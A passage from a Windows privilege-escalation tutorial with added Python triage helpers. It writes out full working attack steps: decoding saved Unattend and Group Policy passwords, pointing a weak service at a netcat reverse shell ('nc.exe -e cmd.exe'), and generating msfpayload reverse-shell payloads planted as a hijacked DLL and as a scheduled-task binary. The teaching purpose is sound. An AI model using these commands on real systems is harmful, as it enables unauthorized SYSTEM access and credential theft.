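      </UserAccounts>
      <AutoLogon>
        <Password>
          <Value>{_AUTOLOGON_VALUE}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def decode_unattend_value(value):
    """Decode a Base64 <Value> and return candidate passwords, most literal
    first: the decoded text, then the text with a Setup suffix stripped."""
    raw = base64.b64decode(value)
    # Setup writes UTF-16LE: every code unit's high byte is NUL for ASCII text.
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) == len(raw) // 2:
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("utf-8", errors="replace")
    candidates = [text]
    for suffix in _SUFFIXES:
        if text.endswith(suffix) and len(text) > len(suffix):
            candidates.append(text[:-len(suffix)])
            break
    return candidates


def _local(tag):
    return tag.rsplit("}", 1)[-1]          # strip the XML namespace


def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name and child.text:
            return child.text.strip()
    return None


def find_unattend_passwords(xml_text):
    """Return (parent element, account, candidates) for every password element
    anywhere in an Unattend/sysprep XML document."""
    hits = []
    for parent in ET.fromstring(xml_text).iter():
        for child in parent:
            if _local(child.tag) not in _PASSWORD_TAGS:
                continue
            value = _child_text(child, "Value")
            if not value:
                continue
            plain = (_child_text(child, "PlainText") or "true").lower() == "true"
            account = (_child_text(parent, "Username") or _child_text(parent, "Name")
                       or ("Administrator" if _local(child.tag) == "AdministratorPassword" else "?"))
            hits.append((_local(parent.tag), account,
                         [value] if plain else decode_unattend_value(value)))
    return hits


def find_sysprep_inf_passwords(ini_text):
    """Return (section, key, value) for every *password* key in a sysprep.inf."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True, strict=False)
    cp.optionxform = str                   # keep key case as written
    cp.read_string(ini_text)
    return [(sec, key, val) for sec in cp.sections()
            for key, val in cp.items(sec) if "password" in key.lower() and val]


if __name__ == "__main__":
    for hit in find_sysprep_inf_passwords(SAMPLE_SYSPREP_INF) + find_unattend_passwords(SAMPLE_UNATTEND_XML):
        print(hit)
```

For a file Setup generated, the suffix-stripped candidate is the real password; for a hand-edited file it is usually the literal one, so try both against the account.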

At the suggestion of Ben Campbell (@Meatballs__) I am adding Group Policy Preferences saved passwords to the list of quick fails. Group Policy Preferences files can be used to create local users on domain machines. When the machine you have compromised is joined to a domain it is well worth looking for the Groups.xml file stored in SYSVOL, which every authenticated domain user can read. The password in the XML file is "obscured" with AES encryption; I say "obscured" because the static key has been published on the MSDN website, so the stored value is trivial to decrypt.

Besides Groups.xml, several other policy preference files can carry the optional "cPassword" attribute:

Services\Services.xml: attribute of the Service element
ScheduledTasks\ScheduledTasks.xml: Task element, TaskV2 element, ImmediateTaskV2 element
Printers\Printers.xml: SharedPrinter element
Drives\Drives.xml: attribute of the Drive element
DataSources\DataSources.xml: attribute of the DataSource element

This can be exploited by browsing SYSVOL by hand and grabbing the relevant files (a screenshot of that appears in the original post).

However, we all like automated solutions so we can get the job done as fast as possible. There are two main options, depending on the kind of shell/access we have: (1) a metasploit module that runs through an established session, or (2) Get-GPPPassword, which is part of PowerSploit. PowerSploit is an excellent PowerShell framework by Matt Graeber for reverse engineering, forensics and penetration testing.

Next we look for the odd registry setting "AlwaysInstallElevated" which, if enabled, allows users of any privilege level to install *.msi files as NT AUTHORITY\SYSTEM. I find the idea bizarre: you create low-privileged users, restricting what they can do on the OS, and then hand them the ability to install programs as SYSTEM. For more background you can read the security issue Parvez of GreyHatHacker reported in his post.

To use this we need to check that both registry values are set correctly; if they are, we can pop a SYSTEM shell. The syntax for querying the respective registry values is shown below.

# This will only work if both keys contain an "AlwaysInstallElevated" value with a DWORD of 1.
C:\Windows\system32> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\Windows\system32> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

To finish this section we do some quick searches on the OS in the hope of striking gold. The search syntax is shown below.

# The command below will search the file system for file names containing certain keywords. You can
# specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*

# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt

# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s

Stages t7 to t10 - Deeper exploitation

Hopefully by now we have a SYSTEM shell, but if not there are still a few attack avenues left. In this final section we look at Windows services and at file/folder permissions. The goal is to use weak permissions to elevate the privileges of our session.

We will be checking a lot of access permissions, so grab a copy of accesschk.exe, a tool from Microsoft's Sysinternals suite. Sysinternals contains many great tools; it is a shame Microsoft does not ship them in the standard Windows build. You can download the suite from Microsoft TechNet.

We start with Windows services since there are some quick wins to be found there. Modern operating systems generally will not ship with vulnerable services; "vulnerable" here means that we can reconfigure the service's parameters. Windows services are a bit like application shortcuts; have a look at the example below.

```
# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        LOAD_ORDER_GROUP   : SpoolerGroup
        TAG                : 0
        DISPLAY_NAME       : Print Spooler
        DEPENDENCIES       : RPCSS
                           : http
        SERVICE_START_NAME : LocalSystem
```
We can use accesschk to check the access level each principal has on each service.
```
# We can see the permissions that each user level has, you can also use "accesschk.exe -ucqv *" to list
# all services.
C:\> accesschk.exe -ucqv Spooler
Spooler
  R  NT AUTHORITY\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  R  BUILTIN\Power Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
```

Accesschk can automatically check whether a given principal has write access to any Windows service. As a low-privileged user we normally want to check "Authenticated Users". Make sure you also check which groups your own user belongs to (whoami /groups on Vista and later): "Power Users", for example, is considered a low-privileged group, even though it is rarely used any more.

Let's compare the output on Windows 8 and on Windows XP SP0.

```
# This is on Windows 8.
C:\Users\b33f\tools\Sysinternals> accesschk.exe -uwcqv "Authenticated Users" *
No matching objects found.

# On a default Windows XP SP0 we can see there is a pretty big security fail.
C:\> accesschk.exe -uwcqv "Authenticated Users" *
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS

C:\> accesschk.exe -ucqv SSDPSRV
SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS

C:\> accesschk.exe -ucqv upnphost
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS
```

This issue was fixed with the introduction of XP SP2; on SP0 and SP1 it can be used as a universal local privilege escalation. By reconfiguring the service we can make it run an arbitrary binary of our choice with SYSTEM-level privileges.

Let's see how this is done in practice. In this case the service is told to run netcat, which opens a reverse shell with SYSTEM privileges; a listener on 127.0.0.1:9988 must already be running and nc.exe must have been uploaded to C:\ beforehand. Other options are of course possible. Two practical points: the service is also switched to run as LocalSystem with obj= ".\LocalSystem" (the account it ran as, NT AUTHORITY\LocalService, would not give us SYSTEM), and because nc.exe never reports back to the Service Control Manager, net start will eventually fail with error 1053 ("The service did not respond to the start or control request in a timely fashion"), but by then the shell has already connected. Note down the original binpath and account so you can restore them afterwards.

```
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Universal Plug and Play Device Host
        DEPENDENCIES       : SSDPSRV
        SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\> sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\> sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS

C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Universal Plug and Play Device Host
        DEPENDENCIES       : SSDPSRV
        SERVICE_START_NAME : LocalSystem

C:\> net start upnphost
```

[screenshot not reproduced]

We will not always have full access to a service even when it is misconfigured. The slide below is taken from Brett Moore's presentation on Windows privilege escalation; any one of the access rights it lists is enough to get us a SYSTEM shell.

[slide from Brett Moore's presentation not reproduced]
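The `-uwcqv "Authenticated Users" *` check above answers the question for one principal at a time. The script below is an added example, not code from the original article or from Sysinternals: it parses `accesschk -ucqv *` style output for every service at once and reports each low-privileged principal holding a right that allows the service to be reconfigured (SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER and the generic equivalents), which is the set that matters once the service runs as LocalSystem. The capture it runs over is constructed to mirror the article's XP SP0 and Windows 7 output; extend LOW_PRIV_PRINCIPALS with the groups `whoami /groups` reports for your session.

```python
"""Triage 'accesschk -ucqv *' output for services a low-privileged principal
can reconfigure. Added example, not from the original article; the capture
below is constructed to mirror the article's XP SP0 and Windows 7 output."""
import re

# Rights that let the holder change what a service runs, or who may change it.
# Together with a start (SERVICE_START, or a reboot for AUTO_START services)
# any of them hands over the service account, usually LocalSystem.
DANGEROUS_SERVICE_RIGHTS = {
    "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE",
}
# Principals a plain local/domain user typically holds; add your own groups.
LOW_PRIV_PRINCIPALS = {
    r"NT AUTHORITY\Authenticated Users", r"NT AUTHORITY\INTERACTIVE",
    r"BUILTIN\Users", r"BUILTIN\Power Users", "Everyone",
}
_ACE_LINE = re.compile(r"^ {1,4}(RW|R|W) +(\S.*?)\s*$")


def parse_accesschk(text):
    """Parse accesschk -v output into {object: {principal: set(rights)}}.

    Layout: an unindented object name, then '  RW <principal>' lines, each
    followed by deeper-indented right names. Other indented lines (such as the
    mandatory-label line printed for directories) are ignored.
    """
    objects, acl, rights = {}, None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            acl = objects.setdefault(line.strip(), {})
            rights = None
            continue
        m = _ACE_LINE.match(line)
        if m and acl is not None:
            rights = acl.setdefault(m.group(2), set())
        elif rights is not None and line.startswith("      "):
            rights.add(line.strip())
    return objects


def hijackable_services(parsed, principals=LOW_PRIV_PRINCIPALS):
    """Sorted [(service, principal, [rights])] where a low-privileged principal
    holds one of DANGEROUS_SERVICE_RIGHTS."""
    hits = []
    for svc, acl in parsed.items():
        for who, rights in acl.items():
            bad = rights & DANGEROUS_SERVICE_RIGHTS
            if who in principals and bad:
                hits.append((svc, who, sorted(bad)))
    return sorted(hits)


# Constructed capture: the article's Win7 Spooler plus the XP SP0 services.
SAMPLE = r"""Spooler
  R  NT AUTHORITY\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS
"""

if __name__ == "__main__":
    for svc, who, rights in hijackable_services(parse_accesschk(SAMPLE)):
        print(f"{svc}: {who} has {', '.join(rights)}")
```

Every hit still needs `sc qc <service>` to confirm the account it runs as and whether you can start it (SERVICE_START, or AUTO_START plus a reboot).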

It is important to work out which groups the session we compromised belongs to. As mentioned before, "Power Users" is also considered a low-privileged group. Power Users have their own set of vulnerabilities; Mark Russinovich wrote a very interesting article on the subject.

The article is "The Power in Power Users" (Mark Russinovich) - [here](https://docs.microsoft.com/en-us/sysinternals/learn/the-power-in-power-users)

Finally we look at file/folder permissions: if we cannot attack the OS directly, we make the OS do the hard work for us. There is far too much to cover here, so I will show two permission vulnerabilities and how to exploit them. Once you have the general idea you will be able to apply these techniques to other situations.

For our first example we replicate the results of a post by Parvez of GreyHatHacker, "Elevating privileges by exploiting weak folder permissions". It is an excellent privilege escalation write-up and I strongly recommend reading it [here](https://www.greyhathacker.net/?p=738).

This example is a special case of DLL hijacking. Programs usually cannot function on their own: they have many resources they need to hook into (mostly DLLs, but also proprietary files). If a program or service loads a file from a directory we have write access to, we can abuse that to pop a shell with the privileges the program runs with.

Generally a Windows application uses pre-defined search paths to find DLLs and checks those paths in a specific order. DLL hijacking usually happens by placing a malicious DLL in one of those paths while making sure it is found before the legitimate one. The problem is mitigated by the application specifying absolute paths to the DLLs it needs.

The DLL search order on a 32-bit system, with SafeDllSearchMode enabled (the default since XP SP2), is as follows:

1 - The directory the application was loaded from

2 - The 32-bit system directory (C:\Windows\System32)

3 - The 16-bit system directory (C:\Windows\System)

4 - The Windows directory (C:\Windows)

5 - The current working directory (CWD)

6 - The directories listed in the PATH environment variable (system, then user)

With SafeDllSearchMode disabled, the current working directory moves up to second place, right after the application's directory. DLLs listed under KnownDLLs in the registry are loaded from the system directory without any search and cannot be hijacked this way.

Sometimes an application tries to load a DLL that does not exist on the machine. This can happen for several reasons, for instance when the DLL is only needed by certain plugins or features that are not installed. In that situation Parvez found that some Windows services attempt to load DLLs that do not exist in a default installation.

Since the DLL in question does not exist, the loader ends up traversing all the search paths. As a low-privileged user we have little hope of placing a malicious DLL in locations 1-4, and 5 is not an option here because we are dealing with a Windows service (its working directory is the system directory). But if we have write access to any directory in the Windows PATH, we win.

Let's see how this works in practice. For our example we use the IKEEXT (IKE and AuthIP IPsec Keying Modules) service, which tries to load wlbsctrl.dll.

```
# This is on Windows 7 as low privilege user1.
C:\Users\user1\Desktop> echo %username%
user1

# We have a win here since any non-default directory in "C:\" will give write access to authenticated
# users.
C:\Users\user1\Desktop> echo %path%
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0;C:\Program Files\OpenVPN\bin;C:\Python27

# We can check our access permissions with accesschk or cacls.
C:\Users\user1\Desktop> accesschk.exe -dqv "C:\Python27"
C:\Python27
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  R  BUILTIN\Users
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_EA
        DELETE
        SYNCHRONIZE
        READ_CONTROL

C:\Users\user1\Desktop> cacls "C:\Python27"
C:\Python27 BUILTIN\Administrators:(ID)F
            BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
            NT AUTHORITY\SYSTEM:(ID)F
            NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
            BUILTIN\Users:(OI)(CI)(ID)R
            NT AUTHORITY\Authenticated Users:(ID)C
            NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

# Before we go over to action we need to check the status of the IKEEXT service. In this case we can see
# it is set to "AUTO_START" so it will launch on boot!
C:\Users\user1\Desktop> sc qc IKEEXT
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IKEEXT
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IKE and AuthIP IPsec Keying Modules
        DEPENDENCIES       : BFE
        SERVICE_START_NAME : LocalSystem
```

Now that we know the necessary conditions are met, we can generate a malicious DLL and pop a shell! (msfpayload and msfencode were retired from Metasploit in 2015; the msfvenom equivalent of the command below is `msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=9988 -f dll -o evil.dll`.)

```
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <[email protected]>
  sf <[email protected]>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     127.0.0.1        yes       The listen address
LPORT     9988             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D > /root/Desktop/evil.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"lhost"=>"127.0.0.1", "lport"=>"9988"}
```

After transferring the DLL to the target, we just need to rename it to wlbsctrl.dll and move it into "C:\Python27". Once that is done we wait patiently for the machine to reboot (or try to force a reboot), and we get a SYSTEM shell.

```
# Again, this is as low privilege user1.
C:\Users\user1\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 948D-A98F

 Directory of C:\Users\user1\Desktop

02/18/2014  01:49 PM    <DIR>          .
02/18/2014  01:49 PM    <DIR>          ..
04/22/2013  09:39 AM           331,888 accesschk.exe
02/18/2014  12:38 PM            14,336 evil.dll
01/25/2014  12:46 AM            36,864 fubar.exe
01/22/2014  08:17 AM    <DIR>          incognito2
06/30/2011  01:52 PM         1,667,584 ncat.exe
11/22/2013  07:39 PM             1,225 wmic_info.bat
               5 File(s)      2,051,897 bytes
               3 Dir(s)  73,052,160 bytes free

C:\Users\user1\Desktop> copy evil.dll C:\Python27\wlbsctrl.dll
        1 file(s) copied.

C:\Users\user1\Desktop> dir C:\Python27
 Volume in drive C has no label.
 Volume Serial Number is 948D-A98F

 Directory of C:\Python27

02/18/2014  01:53 PM    <DIR>          .
02/18/2014  01:53 PM    <DIR>          ..
10/20/2012  02:52 AM    <DIR>          DLLs
10/20/2012  02:52 AM    <DIR>          Doc
10/20/2012  02:52 AM    <DIR>          include
01/28/2014  03:45 AM    <DIR>          Lib
10/20/2012  02:52 AM    <DIR>          libs
04/10/2012  11:34 PM            40,092 LICENSE.txt
04/10/2012  11:18 PM           310,875 NEWS.txt
04/10/2012  11:31 PM            26,624 python.exe
04/10/2012  11:31 PM            27,136 pythonw.exe
04/10/2012  11:18 PM            54,973 README.txt
10/20/2012  02:52 AM    <DIR>          tcl
10/20/2012  02:52 AM    <DIR>          Tools
04/10/2012  11:31 PM            49,664 w9xpopen.exe
02/18/2014  12:38 PM            14,336 wlbsctrl.dll
               7 File(s)        523,700 bytes
               9 Dir(s)  73,035,776 bytes free
```

Everything is set up; now we just need to wait for the system to reboot. For demonstration purposes I have included a screenshot below in which I restart the service manually from an administrator command prompt.

[screenshot not reproduced]
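The reasoning in the walk-through (wlbsctrl.dll is missing, so the loader walks the whole search order, and the first directory in it that Authenticated Users can write to wins) can be made mechanical. The script below is an added example, not code from the original article or from Parvez's post: it builds the search order for a service hosted by svchost.exe from the rules listed earlier, including the SafeDllSearchMode and KnownDLLs caveats, and reports the directory where a planted DLL would be picked up before any legitimate copy. Which directories are writable has to come from accesschk or icacls on the target; here the article's PATH and its writable C:\Python27 are passed in by hand.

```python
"""Decide where a missing DLL could be planted so a service picks it up, using
the search order listed earlier. Added example, not from the original article.
Writable directories must be determined on the target (accesschk/icacls); here
the article's PATH and writable C:\\Python27 are supplied as constructed input."""
import ntpath

SYSTEM_ROOT = r"C:\Windows"
# Partial list of KnownDLLs (HKLM\...\Session Manager\KnownDLLs): these are
# mapped from System32 without a path search and cannot be hijacked this way.
KNOWN_DLLS = {"kernel32.dll", "advapi32.dll", "user32.dll", "ntdll.dll",
              "ole32.dll", "rpcrt4.dll", "shell32.dll"}


def _norm(d):
    """Case-insensitive, trailing-backslash-insensitive key for a directory."""
    return ntpath.normcase(d.strip().rstrip("\\"))


def search_order(app_dir, path_env, cwd=None, safe_dll_search_mode=True):
    """Directories LoadLibrary consults, in order, duplicates removed.

    SafeDllSearchMode is the default since XP SP2; when it is disabled the
    current working directory is searched second. For a service hosted by
    svchost.exe the application directory and the CWD are both System32.
    """
    system_dirs = [ntpath.join(SYSTEM_ROOT, "System32"),
                   ntpath.join(SYSTEM_ROOT, "System"), SYSTEM_ROOT]
    cwd = cwd or app_dir
    if safe_dll_search_mode:
        order = [app_dir] + system_dirs + [cwd]
    else:
        order = [app_dir, cwd] + system_dirs
    order += [p for p in path_env.split(";") if p.strip()]
    seen, deduped = set(), []
    for d in order:
        if _norm(d) not in seen:
            seen.add(_norm(d))
            deduped.append(d.strip())
    return deduped


def hijack_location(dll, order, writable_dirs, present_in=()):
    """First writable directory that is searched before any directory already
    holding the DLL. None means the legitimate copy wins, nothing on the path
    is writable, or the DLL is a KnownDLL."""
    if dll.lower() in KNOWN_DLLS:
        return None
    writable = {_norm(d) for d in writable_dirs}
    present = {_norm(d) for d in present_in}
    for d in order:
        if _norm(d) in writable:
            return d
        if _norm(d) in present:
            return None
    return None


# Constructed from the article's Windows 7 box: user1's PATH and the accesschk
# result showing Authenticated Users can write to C:\Python27.
USER1_PATH = (r"C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;"
              r"C:\Windows\System32\WindowsPowerShell\v1.0;"
              r"C:\Program Files\OpenVPN\bin;C:\Python27")
WRITABLE_BY_AUTH_USERS = {r"C:\Python27"}

if __name__ == "__main__":
    order = search_order(r"C:\Windows\System32", USER1_PATH)
    print(hijack_location("wlbsctrl.dll", order, WRITABLE_BY_AUTH_USERS))  # C:\Python27
```

Feed `present_in` with the directories where a real copy of the DLL already exists (from `where /r C:\ name.dll` or Process Monitor); if the real copy sits earlier in the order than your writable directory, planting a DLL achieves nothing.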

For our final example we look at scheduled tasks. Going back over the results we gathered earlier, we came across the following entry:

```
HostName:                             B33F
TaskName:                             LogGrabberTFTP
Next Run Time:                        2/19/2014 9:00:00 AM
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               B33F\b33f
Task To Run:                          E:\GrabLogs\tftp.exe 10.1.1.99 GET log.out E:\GrabLogs\Logs\log.txt
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           9:00:00 AM
Start Date:                           2/17/2014
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled
```

It looks like the box has a TFTP client that connects to a remote host and fetches some sort of log file. We can see the task runs every day at 9 AM and that it runs with SYSTEM privileges (bad). Let's see whether we have write access to that folder.

```
C:\Users\user1\Desktop> accesschk.exe -dqv "E:\GrabLogs"
E:\GrabLogs
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_EA
        DELETE
        SYNCHRONIZE
        READ_CONTROL
  R  BUILTIN\Users
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL

C:\Users\user1\Desktop> dir "E:\GrabLogs"
 Volume in drive E is More
 Volume Serial Number is FD53-2F00

 Directory of E:\GrabLogs

02/18/2014  11:34 PM    <DIR>          .
02/18/2014  11:34 PM    <DIR>          ..
02/18/2014  11:34 PM    <DIR>          Logs
02/18/2014  09:21 PM           180,736 tftp.exe
               1 File(s)        180,736 bytes
               3 Dir(s)   5,454,602,240 bytes free
```

Clearly this is a serious configuration issue: there is no need for this task to run as SYSTEM, and worse, any authenticated user has write access to the folder. Ideally, on a pentest engagement, I would grab the TFTP client, backdoor the PE executable, make sure it still runs perfectly and put it back on the target. For the purposes of this example, though, we can simply overwrite the binary with a Metasploit-generated executable.

```
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <[email protected]>
  sf <[email protected]>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     127.0.0.1        yes       The listen address
LPORT     9988             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' R | msfencode -t exe > /root/Desktop/evil-tftp.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
```

All that remains is to upload our malicious executable and overwrite "E:\GrabLogs\tftp.exe". Once that is done we can go to bed early and wake up to our shell in the morning. One important thing to remember here is to check the time and time zone of the box we are trying to compromise.

```
C:\Users\user1\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 948D-A98F

 Directory of C:\Users\user1\Desktop

02/19/2014  01:36 AM    <DIR>          .
02/19/2014  01:36 AM    <DIR>          ..
04/22/2013  09:39 AM           331,888 accesschk.exe
02/19/2014  01:31 AM            73,802 evil-tftp.exe
01/25/2014  12:46 AM            36,864 fubar.exe
01/22/2014  08:17 AM    <DIR>          incognito2
06/30/2011  01:52 PM         1,667,584 ncat.exe
02/18/2014  12:38 PM            14,336 wlbsctrl.dll
11/22/2013  07:39 PM             1,225 wmic_info.bat
               6 File(s)      2,125,699 bytes
               3 Dir(s)  75,341,824 bytes free

C:\Users\user1\Desktop> copy evil-tftp.exe E:\GrabLogs\tftp.exe
Overwrite E:\GrabLogs\tftp.exe? (Yes/No/All): Yes
        1 file(s) copied.
```

To show this privilege escalation in action I fast-forwarded the system time. As you can see in the screenshot below, we got our SYSTEM shell on the dot at 9 AM.
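Spotting the LogGrabberTFTP entry by eye works for one task; on a real box `schtasks /query /fo LIST /v` returns hundreds. The script below is an added example, not code from the original article: it parses that LIST output, pulls the executable out of "Task To Run" (quoted or not, with %windir%/%SystemRoot% expanded), and flags enabled tasks that run as SYSTEM or another service account from a binary outside the Windows directory. Those directories are the ones to check with `accesschk -dqv`, exactly as the article does for E:\GrabLogs. The capture is constructed from the article's entry plus a stock Microsoft task for contrast; the environment-variable values are assumed.

```python
"""Parse 'schtasks /query /fo LIST /v' output and flag privileged tasks whose
binary lives outside the Windows directory. Added example, not from the
original article; the capture is constructed from the article's entry."""
import ntpath
import re

_FIELD = re.compile(r"^(.+?):\s{2,}(.*)$")  # 'Key:<padding>value'
PRIVILEGED = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}
ENV = {"%windir%": r"C:\Windows", "%systemroot%": r"C:\Windows"}  # assumed values


def parse_schtasks_list(text):
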